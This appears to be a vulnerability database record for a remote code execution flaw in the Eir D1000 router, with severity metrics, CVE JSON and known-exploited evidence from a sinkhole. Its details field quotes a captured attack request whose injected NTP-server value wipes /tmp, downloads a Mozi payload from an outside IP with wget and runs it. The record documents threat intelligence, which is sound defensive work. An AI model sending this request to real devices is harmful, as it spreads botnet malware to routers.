GCVE-1-2026-0020
Vulnerability from gna-1 – Published: 2026-03-11 14:12 – Updated: 2026-03-11 14:23
VLAI?
CIRCL
Title
Remote Code Execution Attack Against Eircom D1000 Router
Summary
Improper Input Validation vulnerability in Eir D1000 allows Input Data Manipulation.This issue affects D1000: through 2.00(AADU.5)_20150909
Severity ?
CWE
- CWE-20 - Improper Input Validation
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Date Public ?
2016-12-09 23:00
CIRCL
Known Exploited Vulnerability - GCVE BCP-07 Compliant
KEV entry ID: 523ca818-9868-4f11-832b-baf2fbd9d76c
Exploited: Yes
Characteristics
Remote Code Execution:
Yes
Authentication Required:
No
Local Access Required:
Remote
Severity:
100.0
Timestamps
First Seen: 2026-01-14
Asserted: 2026-03-11
Last Seen: 2026-03-11
Evidence
Type: Sinkhole
Signal: In The Wild Attempts
Confidence: 100%
Source: cti-feed.circl.lu
Details
| Note | POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7574 User-Agent: Hello, world SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 640 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;> <NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://180.243.4.71:51387/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064` </NewNTPServer1><NewNTPServer2>`echo DEATH` </NewNTPServer2><NewNTPServer3>`echo DEATH` </NewNTPServer3><NewNTPServer4>`echo DEATH` </NewNTPServer4><NewNTPServer5>`echo DEATH` </NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope> |
|---|
Created: 2026-03-11 14:14 UTC
| Updated: 2026-03-23 06:37 UTC
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "D1000",
"vendor": "Eir",
"versions": [
{
"lessThanOrEqual": "2.00",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"datePublic": "2016-12-09T23:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Improper Input Validation vulnerability in Eir D1000 allows Input Data Manipulation.\u003cp\u003eThis issue affects D1000: through\u0026nbsp; 2.00(AADU.5)_20150909\u003c/p\u003e"
}
],
"value": "Improper Input Validation vulnerability in Eir D1000 allows Input Data Manipulation.This issue affects D1000: through\u00a0 2.00(AADU.5)_20150909"
}
],
"impacts": [
{
"capecId": "CAPEC-153",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-153 Input Data Manipulation"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 10,
"baseSeverity": "CRITICAL",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20 Improper Input Validation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"orgId": "00000000-0000-4000-9000-000000000000"
},
"references": [
{
"tags": [
"media-coverage"
],
"url": "https://threatprotect.qualys.com/2016/12/14/remote-code-execution-attack-against-eircom-d1000-router/"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Remote Code Execution Attack Against Eircom D1000 Router",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "00000000-0000-4000-9000-000000000000",
"datePublished": "2026-03-11T14:12:00.000Z",
"dateUpdated": "2026-03-11T14:23:24.609831Z",
"requesterUserId": "00000000-0000-4000-9000-000000000000",
"serial": 1,
"state": "PUBLISHED",
"vulnId": "GCVE-1-2026-0020",
"vulnerabilitylookup_history": [
[
"alexandre.dulaunoy@circl.lu",
"2026-03-11T14:12:30.597173Z"
],
[
"alexandre.dulaunoy@circl.lu",
"2026-03-11T14:21:34.097103Z"
],
[
"cedric.bonhomme@circl.lu",
"2026-03-11T14:23:24.609831Z"
]
]
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…